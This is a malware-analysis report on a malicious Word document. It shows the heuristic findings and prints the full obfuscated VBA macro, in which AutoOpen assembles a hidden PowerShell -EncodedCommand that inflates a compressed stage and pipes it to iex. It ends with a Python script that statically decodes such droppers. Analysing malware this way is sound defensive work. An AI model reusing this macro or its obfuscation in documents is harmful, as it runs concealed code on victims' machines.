Verdict: MALICIOUS
Risk score: 150

Heuristics (6)
- VBA macros detected (medium, OLE_VBA_MACROS; 3 related findings)
  Document contains VBA macro code.

- Potential Shell call in VBA (critical, OLE_VBA_SHELL)
  Potential Shell call in VBA. Matched lines in script:
  `HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)`
  `uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)`
  `ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk`
  The command string is built from `Chr(vbKeyP)` ("P") plus the return values of five string-building functions; `uBUVdDWwb`, `oaqivfzkbRZ`, `OXTVTfl` and `XVaYNJzzA` are never assigned, so the second argument reduces to `vbHide` and the spawned process runs with a hidden window.

- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

- AutoOpen macro (low, OLE_VBA_AUTOOPEN)
  AutoOpen macro. Matched line in script:
  `Sub Autoopen()` (immediately followed by `On Error Resume Next`)

- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
  OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. In this report a VBA project was in fact recovered (macros.bas, below), so the finding repeats the AutoOpen evidence rather than adding to it.

- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the DrawingML XML namespace that ordinary Office documents carry, not an attacker-controlled address.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10650 bytes | a50f4f6d48ffa8332ba4c36f328ddfcd185a9f6eb34edfc1e56ffb542f5f5a29 |
Preview script (first 1,000 lines of the extracted script):

```vba
Attribute VB_Name = "tdFNRaQVsjio"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function uibHIc()
On Error Resume Next
YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854) / jTziu / zOJji
zisoU = CSng(56708 * CInt(51425) + 47295 - 4207)
PVCqOP = 39850 + Log(47690) - hcwzn / Atn(6854) / drQLFK / JfiKw
HnTGoD = CSng(54335 * CInt(61172) + 7493 - 78968)
uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + JiHJpfwpl + waotA + PIuhQC + DhiBaAHqKdt + wjcaHrlizD, OXTVTfl + vbHide + XVaYNJzzA)
ukVArD = 62867 + Log(8946) - YAjHqp / Atn(9756) / tLkEX / HuIpJk
QZCiRU = CSng(80585 * CInt(6357) + 33383 - 53648)
End Function
Sub Autoopen()
On Error Resume Next
GLRHEL = 29975 + Log(98584) - LmsEdW / Atn(3076) / GjOXU / IahZZ
PNbjn = CSng(97547 * CInt(23222) + 34230 - 99088)
uibHIc
waJmQd = 63027 + Log(95393) - uTbwi / Atn(26573) / lBIjW / piizKJ
iKjOQ = CSng(74018 * CInt(76863) + 26414 - 64589)
End Sub
Attribute VB_Name = "ftjTiBnQtVNMKJ"
Function JiHJpfwpl()
On Error Resume Next
GUYOE = 81629 + Log(61093) - aoEWBA / Atn(16526) / wJuodU / ZDoud
OKaNEH = CSng(24403 * CInt(27696) + 93931 - 88975)
RpzYtmjGdh = "owersHeLL -" + "e KABu" + "AGUAVwAtA" + "G8AQ" + "gBKAGUAQ" + "wB" + "UACAAaQBPAC4A" + "YwBPAE0AcAByAGU" + "AUwB" + "zAGkATwBOAC4AZ"
IFkkjp = 7898 + Log(50958) - KmwkU / Atn(55466) / JwLQwC / LddIw
vOCPGj = CSng(46565 * CInt(69153) + 50431 - 87454)
OsSdfpaUk = "ABl" + "AEYAbABh" + "AH" + "QAZQBTA" + "HQ" + "AUg"
kTGTc = 23198 + Log(82171) - cVCPld / Atn(84274) / kYHCj / hbvki
oECjFz = CSng(61796 * CInt(54059) + 93131 - 3009)
dRBwwqHbqj = "BlA" + "EEATQAoAF" + "sA" + "cw" + "B5AFMAdAB" + "FAG0ALgB" + "pAE8AL" + "gBtAGUAbQBvAFIA"
RmQUYs = 98530 + Log(32124) - PaoLTq / Atn(63481) / miYsdN / XTTKn
PJippQ = CSng(31555 * CInt(75540) + 17375 - 66142)
jpQbjBsBDRE = "WQBzAHQAUg" + "BFAGEATQBdACAAW" + "wBDAG8ATgB2A" + "GUAcgB0AF0AOgA6"
TzOOQr = 31652 + Log(28204) - DpRdq / Atn(77289) / MwFZo / ozRFVd
QpdwbZ = CSng(61732 * CInt(98676) + 79423 - 13351)
HnXhIniPUfH = "AEYAcgBP" + "AE0AY" + "gBBAHMA" + "RQA2ADQAUwBUAFI" + "ASQBOA" + "GcAKAAn" + "AFQAWg"
CvWuar = 9907 + Log(98593) - qDqEI / Atn(14712) / IOzLWn / AOLVBR
ZXpdW = CSng(86660 * CInt(12359) + 88408 - 48107)
juhpbi = "BKA" + "FIAYg" + "A1A" + "HMAdwBGAEkAWAB" + "mAEoA" + "KwAwAC8AVw" + "BCAEcAcQBRAFQ" + "AU"
AVbjM = 98004 + Log(49527) - TiXkrv / Atn(11216) / HWjOW / htRjA
mOjOpX = CSng(20825 * CInt(372) + 22571 - 9276)
sEfSoZ = "gBtAG" + "IAVgArAG0Ab" + "wBrAG4AZABFAGs" + "AMw" + "BLA" + "FMALw" + "BiAE" + "EAcABxADcAUw" + "BI" + "AG4AQw"
JiHJpfwpl = RpzYtmjGdh + OsSdfpaUk + dRBwwqHbqj + jpQbjBsBDRE + HnXhIniPUfH + juhpbi + sEfSoZ
End Function
Function waotA()
On Error Resume Next
Plhhik = 79520 + Log(60168) - XGljNK / Atn(6315) / ohSfww / FzIuT
FDCjRd = CSng(77331 * CInt(41412) + 98133 - 16888)
DQQVlUzJkUJ = "Bj" + "AEcAMg" + "BBAE" + "YARwA0AEUAVABpA" + "HEATAA4ADk" + "AOQAxAEQA"
BGDfdz = 2124 + Log(60670) - NMdmH / Atn(32049) / jcjcuL / RCiAw
PbpZqi = CSng(84381 * CInt(91021) + 41115 - 54621)
dzHiidcVtqU = "cwByAFoA" + "SQAxAD" + "kAagBtADgAegAz" + "AG4ANABo" + "AHYAWQBYAG0AOQ" + "AxAHYAeA" + "BWA" + "GYA"
HPzXta = 31286 + Log(52699) - qHtPj / Atn(63814) / zlcuzE / FmWEvd
rLzkU = CSng(59980 * CInt(23107) + 73013 - 46318)
zItaivYNiiX = "eABGAFUAbwB" + "yAF" + "kAdwBsAHkAVABpA" + "FUAdwA5AHgAdA" + "Av" + "AG0ASgBoAFo" + "AQgBSAEwATAB" + "5AFAAUg"
SZwrHi = 49473 + Log(86021) - ouJsi / Atn(254) / QtkWV / wbwvt
LBiLNA = CSng(52830 * CInt(49103) + 16444 - 14214)
hUPPifK = "BhAGIAdAAxA" + "FQAUgBv" + "ADg" + "AUABm" + "ADEAaQBWAGoA" + "SABMAG8AQgB3AE" + "EAdgA3AEUAV"
EzLmoi = 65654 + Log(36701) - kSOSB / Atn(2769) / wbUsM / uhHKiv
GauJvj = CSng(48907 * CInt(18721) + 66342 - 18185)
oVRiWa = "ABHAG8AbABzA" + "DcARA" + "AwADEAYQB" + "rADEAZQ" + "BQAGQASgBtA" + "FUAVg" + "BkA" + "GsA" + "ZgBS" + "AHEAcwBzADI"
Qcbutn = 22775 + Log(19563) - tdwoO / Atn(72292) / Ciiiv / aKJXEW
czPRW = CSng(54037 * CInt(68450) + 26367 - 614)
GLcbiBSXQP = "AOQA4AE0A" + "cgBnAEk" + "ASwBrAHMAdgBQAH" + "IAegA1AHgATQ"
TwYjwd = 54397 + Log(11491) - KRXfDi / Atn(4006) / BQkVip / kwNjRm
BCqKj = CSng(43280 * CInt(6165) + 54045 - 64405)
YGnZa = "ArADEA" + "dQB" + "QADEAOABlADM" + "ATgAzAEYAN" + "gBYAEIAMQArA" + "FgAaQBOA" + "DA"
RKLDES = 22282 + Log(74855) - whzPS / Atn(71029) / jwCPv / HIQUot
faZjDD = CSng(47611 * CInt(56912) + 73448 - 60382)
iBPkl = "ATwBo" + "AC8AUA" + "BpAGgAOQBKAD" + "cAegB0A"
CtwoUE = 74033 + Log(46174) - XnEZS / Atn(72589) / CDmjdS / pXIOMP
fzTYN = CSng(4087 * CInt(84441) + 36939 - 77506)
rHdUlwKFsh = "GYAZABKAE" + "EAbABmAHUAd" + "wBJAE4AdQB" + "NAEsAcwBuAG8" + "AWAAyAHQATwA4"
waotA = DQQVlUzJkUJ + dzHiidcVtqU + zItaivYNiiX + hUPPifK + oVRiWa + GLcbiBSXQP + YGnZa + iBPkl + rHdUlwKFsh
End Function
Function PIuhQC()
On Error Resume Next
iQTbs = 43134 + Log(179) - RZWaz / Atn(91199) / jFHRL / aINspk
EjljP = CSng(51706 * CInt(2867) + 25226 - 97683)
wzwClYKNqwo = "AFYAdgA" + "0ADUAbwBFAFI" + "AdABvADUAZ" + "ABoADIASAA5" + "AGU" + "AYwB" + "xAGUASg" + "BMA" + "DQAawBoA" + "HIAcQBFAHoAKwB"
wBIwu = 79278 + Log(80345) - wYYdw / Atn(70130) / cWIHF / ClzMho
KYtnls = CSng(20634 * CInt(30850) + 6688 - 86692)
HwlUawhj = "3AGcAMwBGA" + "FgANwBUAHkAUgBC" + "AFYANQB4AE4AT" + "ABvA" + "EEAMQBYA" + "E0AawB" + "IAGYAYQBLAEUA" + "ZwBYAG8AcgB" + "uAE8AR"
TXmrMc = 53171 + Log(74600) - hmEtF / Atn(86244) / uPJkMA / uZikr
ZmZcc = CSng(77173 * CInt(65687) + 92365 - 20691)
toUwiCRTvu = "ABhAG0" + "AMwB4AH" + "cAQQA0AGcA" + "Mw" + "AzAGIAVQ" + "BWAE4AVABO" + "AEEAZABk" + "ADAAMABCADQAaQB" + "yADkAbwBEAFQ" + "AT"
WkvnG = 46369 + Log(37427) - hsNQA / Atn(89139) / SSVsS / sjibuN
QRKijq = CSng(74827 * CInt(283) + 34245 - 25482)
zZzsBka = "AA3A" + "FQASgByAGk" + "ARgBNAEU" + "AeABBA" + "G0AMAB"
WGdCzq = 17526 + Log(71918) - UKVMDs / Atn(81946) / ANMLKr / QhfhKH
AFYWL = CSng(9670 * CInt(79956) + 69342 - 83452)
aRQOVPN = "hAEMAa" + "ABPAHMASQBvA" + "HYAaABxAEUAd" + "QBNAG0" + "ANgB0AFUAb" + "gBMA" + "EEAdwB0ADgAa"
JiHFw = 95762 + Log(58946) - zIzEBl / Atn(22649) / smRKb / XMJPnh
loQVuB = CSng(53246 * CInt(69648) + 58854 - 39738)
RsjpO = "QBOAEoANAB" + "SAF" + "QAbQB0AHUARABo" + "AGcAYQBPADgAc" + "wB" + "PAHcARwA"
BqKwIv = 8717 + Log(76532) - zMDSj / Atn(81453) / LuwjJz / OUijH
kiORiJ = CSng(71724 * CInt(31549) + 47744 - 6627)
VlizSTVA = "0AEM" + "AWAA2" + "AHA" + "AcQBwAHgAZQ" + "B2AHkAZgB4AG8AQ"
LAWjZ = 70803 + Log(97625) - DTQpio / Atn(50079) / jwdaM / EaSzmk
FSmri = CSng(40669 * CInt(18580) + 51402 - 51475)
IQKSSuhRo = "QByAD" + "kAdABoAF" + "MAYwBLAF" + "oATQBxAHkAMw" + "BWAEUAMwB2AD" + "IARA" + "BC" + "AEMAKwBMADk" + "AawBq" + "AGwAYgBWAD"
PIuhQC = wzwClYKNqwo + HwlUawhj + toUwiCRTvu + zZzsBka + aRQOVPN + RsjpO + VlizSTVA + IQKSSuhRo
End Function
Function DhiBaAHqKdt()
On Error Resume Next
jjuDQT = 79151 + Log(61318) - IFETuc / Atn(2260) / vwQbw / SwAdz
TQdFH = CSng(88640 * CInt(82795) + 35633 - 88594)
razwsUSXkz = "EAN" + "QBVAE0" + "AVwA0" + "AFY"
GdRJbR = 313 + Log(96674) - OhHNiK / Atn(24583) / UcEPqr / JrczLA
iTIpmJ = CSng(79738 * CInt(74534) + 1832 - 96987)
RvhrFbRD = "AKwBmAEwAU" + "gBlADQAS" + "AByAEsASAArAD" + "MAYQAvAHEAUw" + "BzAGoAWQB" + "pAEgALwBT" + "AE" + "IANg" + "BuAG0ANAB"
ljTLC = 97388 + Log(91233) - IWqpYP / Atn(73713) / zkoAmq / wnFoXC
ibGMEI = CSng(24212 * CInt(96264) + 78923 - 57956)
TNKmLlSNFc = "0AEYARwBFAG8" + "ARgBuAFIA" + "ZQAw" + "AEIAUABHAF" + "IASABkAGUA" + "awBUAFIAawBHAHU" + "AdAA4AFoAVQB" + "WAGsAeAB" + "YAFYAOQAwADkATg" + "AxADQAUg"
QrPsi = 68939 + Log(49823) - XqCMz / Atn(31374) / GUXwKY / NoPiLL
ZBvKzV = CSng(98060 * CInt(25668) + 12052 - 18210)
VvalJtDjt = "BKACsAbwAy" + "AGQA" + "TABsAGoANwBiAE" + "8AZgArAGoAdAA" + "5ADEAVgBl" + "AD" + "AAKwB5AE0A"
OWiFf = 27946 + Log(16995) - KBrasU / Atn(60832) / ibcvY / WwoHC
uvsOO = CSng(52202 * CInt(91255) + 3023 - 25833)
wClbolr = "cQB0A" + "GwAUABsAC8AawB1" + "AHIALwBKADEATQ" + "BRA" + "HUAagBhAH" + "cASAB0AEsATAA" + "xAGkAZwBSA" + "FgAKwB5ADgA"
IAaOB = 54749 + Log(64621) - DqRzUl / Atn(56539) / zzAjQ / MIBOI
LQYiKW = CSng(36388 * CInt(53979) + 41244 - 18795)
fJjMzfdB = "RgBCADQ" + "AU" + "gBtAHQ" + "AUgBYAE4A" + "ZQByADYAW" + "QBLA" + "EcAKwA2AHMAOABF"
tQNDM = 67414 + Log(95473) - HkAdvB / Atn(63082) / joRMmT / PmRnm
TBsnmG = CSng(30632 * CInt(6074) + 39507 - 99903)
zVJAjtFu = "AHg" + "AdQBXAFAAYwA1A" + "FAAUgBuAHQAV" + "ABYAG" + "sAOABuAGY" + "ANABCACcA" + "KQAgACw" + "AIABbAFMAWQ" + "BTAHQAZQB" + "NAC"
EmBsL = 75191 + Log(55759) - ijinDw / Atn(51864) / MwRuvL / ojHqJu
nPosI = CSng(99830 * CInt(34467) + 21996 - 8207)
lWPjjmQqj = "4AaQ" + "BvAC4AQwBPAE0A" + "UABSAEUAcw" + "BTAGkAbwBOAC4AQ" + "wBPAG0AcAByA"
oKHRkN = 78424 + Log(82065) - jDFCF / Atn(56942) / INIDwT / NsTwLo
IBtSGl = CSng(6877 * CInt(24763) + 7565 - 41805)
QREzuXGrkj = "GUAUwBTAEkA" + "TwBuA" + "E0AbwBEAGUAX" + "QA6ADoARABFAGM" + "ATwBN" + "AFA" + "AcgBFA" + "HMAUwApA" + "HwAIA"
DhiBaAHqKdt = razwsUSXkz + RvhrFbRD + TNKmLlSNFc + VvalJtDjt + wClbolr + fJjMzfdB + zVJAjtFu + lWPjjmQqj + QREzuXGrkj
End Function
Function wjcaHrlizD()
On Error Resume Next
zwONi = 24235 + Log(68003) - QrECA / Atn(4564) / cuYQP / CkXCLk
spvJnk = CSng(94550 * CInt(40803) + 36359 - 99411)
PwqkGFkZdsj = "BmAE8AcgBlA" + "GEAQwBIAC0" + "AbwBCAEoARQBDA" + "FQAew" + "AgAG4AZQBXAC0Ab" + "wBCAEoA" + "ZQBDAFQAIABJAG8"
GPwYj = 7934 + Log(97596) - QkIIon / Atn(12606) / zOrLXc / WavuPQ
zJuPJ = CSng(99654 * CInt(63178) + 58563 - 417)
WAivCj = "ALgBzAH" + "QAcgB" + "lAEEATQByAG" + "UAQ" + "QB" + "EAE" + "UAcgAo"
DSUOk = 61831 + Log(15088) - juAHb / Atn(77096) / ifazoJ / cKlwOY
GISNXI = CSng(10390 * CInt(15540) + 41698 - 72929)
MJzzI = "ACAAJABf" + "AC" + "wAWwBUAGUAeABU" + "AC4ARQ" + "BOAGMA" + "TwBkAGkATgBHAF0"
nXiWFs = 65605 + Log(13167) - fUGhLJ / Atn(38065) / JdmSis / lhtEf
WJoCBl = CSng(1659 * CInt(10606) + 11185 - 85103)
tuAfZQG = "AOgA6A" + "EEAcwBjAEkASQAg" + "ACkAfQAgACkALgB" + "yAGUAQQBkAFQ" + "ATwBFAG4AZA" + "AoACAA" + "KQB"
HvwmC = 71768 + Log(4576) - oPwsz / Atn(55134) / iIlXz / bwIKSf
YSkDl = CSng(42100 * CInt(21100) + 75555 - 89520)
XCjqf = "8ACYAIAAoACAA" + "JABlAG4AdgA" + "6AGMAbwBNAFMAUA" + "BlAGMAWwA0ACw" + "AMQA1ACwAMgA" + "1AF0ALQB" + "KAG8ASQB" + "OACcAJwAp"
jwqqrR = 45558 + Log(33128) - ZwGsUi / Atn(85440) / jzpbkG / pVivHd
RkUBb = CSng(17664 * CInt(74459) + 69013 - 59706)
zUDVai = "AA=="
wjcaHrlizD = PwqkGFkZdsj + WAivCj + MJzzI + tuAfZQG + XCjqf + zUDVai
End Function
```
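Reading the macro: `Autoopen` calls `uibHIc`, which concatenates `Chr(vbKeyP)` ("P") with the return values of `JiHJpfwpl`, `waotA`, `PIuhQC`, `DhiBaAHqKdt` and `wjcaHrlizD`, giving `PowersHeLL -e <base64>` (the `-e` argument is PowerShell's `-EncodedCommand`: base64 over UTF-16LE text), and passes it to `Shell(..., vbHide)`; the arithmetic lines and the never-assigned names (`uBUVdDWwb`, `OXTVTfl`, ...) are padding that `On Error Resume Next` lets evaluate to Empty. Decoding the fragments by hand, the argument begins `(neW-oBJeCT iO.cOMpreSsiON.deFlateStReAM([syStEm.iO.memoRYstReaM] [CoNvert]::FrOMbAsE64STRINg('` and ends `).reAdTOEnd( )|& ( $env:coMSPec[4,15,25]-JoIN'')`, i.e. a deflate-compressed second stage is inflated and piped to `iex` spelled from characters of `%COMSPEC%`. The script below, added here as an example and not part of the analyzer or the sample, performs that reassembly statically so an analyst can recover the stage without running the document. It assumes the concatenation idiom seen above (quoted fragments joined with `+`, zero-argument helper functions, `Chr(vbKeyX)`, a `Shell()` whose first argument contains no comma); the embedded VBA is a constructed miniature in the same shape, with function names `partA`/`partB` and a harmless `FAKE_COMMAND` generated at runtime so the expected output is known.

```python
"""Static recovery of the command a string-concatenation VBA dropper passes to Shell().

Added example; not code from the analyzer or from the sample. It reproduces the
macro's own string assembly without executing anything, then decodes the -e
argument as base64 over UTF-16LE (PowerShell -EncodedCommand).
"""
import base64
import re

# Constructed stand-in for the real payload (the sample carries a deflate-compressed stager).
FAKE_COMMAND = "Write-Host 'decoded stage'"

FUNC = re.compile(r"Function (\w+)\(\)(.*?)End Function", re.S)
ASSIGN = re.compile(r"^\s*(\w+)\s*=\s*(.+?)\s*$", re.M)
# One operand of a VBA '+' chain: a string literal, Chr(vbKeyX), or a bare name / call.
OPERAND = re.compile(r'"([^"]*)"|Chr\(vbKey([A-Z0-9])\)|(\w+)')
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e\w*\s+([A-Za-z0-9+/=]+)")


def make_sample_vba(cmd: str) -> str:
    """Emit a CONSTRUCTED dropper-shaped macro carrying `cmd` as the -e argument."""
    b64 = base64.b64encode(cmd.encode("utf-16-le")).decode()
    frags = [b64[i:i + 7] for i in range(0, len(b64), 7)]  # uneven chunks, as in the sample
    half = len(frags) // 2
    quoted_a = '" + "'.join(frags[:half])
    quoted_b = '" + "'.join(frags[half:])
    return (
        "Function uibHIc()\n"
        "On Error Resume Next\n"
        "YuOaOu = 74629 + Log(55957) - IDlKlO / Atn(84854)\n"
        "uibHIc = oaqivfzkbRZ + Shell(uBUVdDWwb + Chr(vbKeyP) + partA + partB, OXTVTfl + vbHide)\n"
        "End Function\n"
        "Function partA()\n"
        "On Error Resume Next\n"
        f'x1 = "owersHeLL -" + "e " + "{quoted_a}"\n'
        "partA = x1\n"
        "End Function\n"
        "Function partB()\n"
        "On Error Resume Next\n"
        f'x2 = "{quoted_b}"\n'
        "partB = x2\n"
        "End Function\n"
    )


def parse_functions(vba: str) -> dict:
    """Map each Function name to its {variable: right-hand side} assignments."""
    return {name: dict(ASSIGN.findall(body)) for name, body in FUNC.findall(vba)}


def resolve(expr: str, scope: dict, funcs: dict, depth: int = 0) -> str:
    """Evaluate a '+' concatenation of literals, local variables and zero-argument
    function calls. Names that are never assigned are Empty Variants under
    On Error Resume Next and concatenate as "". vbKeyX is the key code of the
    character X, so Chr(vbKeyX) is X itself."""
    if depth > 50:
        raise ValueError("reference cycle in macro")
    out = []
    for lit, key, name in OPERAND.findall(expr):
        if key:
            out.append(key)
        elif name in scope:
            out.append(resolve(scope[name], scope, funcs, depth + 1))
        elif name in funcs:  # a helper function: its value is what it assigns to its own name
            out.append(resolve(funcs[name].get(name, ""), funcs[name], funcs, depth + 1))
        else:
            out.append(lit)  # a string literal, or "" for an unassigned name
    return "".join(out)


def shell_command(vba: str) -> str:
    """Return the string the macro passes as the first argument of Shell()."""
    funcs = parse_functions(vba)
    for scope in funcs.values():
        for rhs in scope.values():
            m = re.search(r"Shell\(([^,]+),", rhs)  # assumes no comma inside the 1st argument
            if m:
                return resolve(m.group(1), scope, funcs)
    raise ValueError("no Shell() call found")


def decode_encoded_command(cmd: str) -> str:
    """Decode a PowerShell -e / -enc / -EncodedCommand argument (base64 of UTF-16LE)."""
    m = ENC_ARG.search(cmd)
    if not m:
        raise ValueError("no -EncodedCommand argument in: %r" % cmd[:60])
    return base64.b64decode(m.group(1)).decode("utf-16-le")


def recover(vba: str) -> tuple:
    """(Shell() command line, decoded PowerShell) for a macro of this shape."""
    cmd = shell_command(vba)
    return cmd, decode_encoded_command(cmd)


if __name__ == "__main__":
    line, script = recover(make_sample_vba(FAKE_COMMAND))
    print(line[:48] + "...")
    print(script)
```

On the real macros.bas the decoded stage is itself `[Convert]::FromBase64String(...)` fed through a `DeflateStream`, so a second pass (base64 decode, then raw-deflate inflate with `zlib.decompress(data, -15)`) is needed to reach the plaintext script; do that in an isolated analysis VM and never by letting PowerShell evaluate the string.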